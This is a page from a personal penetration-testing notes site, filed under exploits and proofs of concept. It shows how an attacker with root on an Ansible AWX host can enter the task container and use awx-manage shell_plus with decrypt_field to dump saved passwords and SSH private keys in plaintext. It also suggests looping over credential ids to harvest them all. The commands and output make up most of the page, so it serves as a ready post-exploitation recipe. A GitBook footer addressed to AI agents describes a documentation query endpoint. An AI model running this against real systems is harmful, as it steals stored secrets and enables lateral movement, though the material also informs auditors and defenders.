> For the complete documentation index, see [llms.txt](https://0xpthree.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xpthree.gitbook.io/notes/exploits-pocs/ansible/ansible-awx.md).

# Ansible AWX

Ansible AWX is the open-source equivalent of the commercial Ansible Tower. AWX provides a web-based user interface, REST API, and task engine built on top of [Ansible](https://github.com/ansible/ansible). It is one of the upstream projects for [Red Hat Ansible Automation Platform](https://www.ansible.com/products/automation-platform).

Ansible AWX installations come with three default Docker containers, one container for the web interface, one container for its database, and one container for performing tasks also known as Jobs.&#x20;

One of it's features is *'Credentials'* which allows administrators to store credentials, private keys and other sensitive information to be utilized by Ansible AWX for authentication when launching Jobs against other machines.

Ansible AWX uses SSH to connect to remote hosts (or the Windows equivalent) and no matter what type of secret (private key, password, etc.) is used, the secret needs to be decrypted before connecting to the remote host. This decrypt function can be **used maliciously to&#x20;**<mark style="color:red;">**harvest all saved credentials**</mark>**&#x20;in plaintext**.

```python
[root@victimHost ~]# docker exec -it awx_task /bin/bash
bash-4.4# awx-manage shell_plus
>>> from awx.main.utils import decrypt_field
>>> creds = Credential.objects.get(name="vSphere-01")
>>> print(decrypt_field(creds, "password"))
H************************

>>> creds = Credential.objects.get(name="admin-id_rsa")
>>> print(decrypt_field(creds, "ssh_key_data"))
-----BEGIN RSA PRIVATE KEY-----
M************************
```

> **Note:** the `Credential.objects.get` parameter `name` is referring to the column `name`. This could instead be changed to something more iterable like `id` for looping through and decrypting all saved credentials.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/ansible/ansible-awx.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.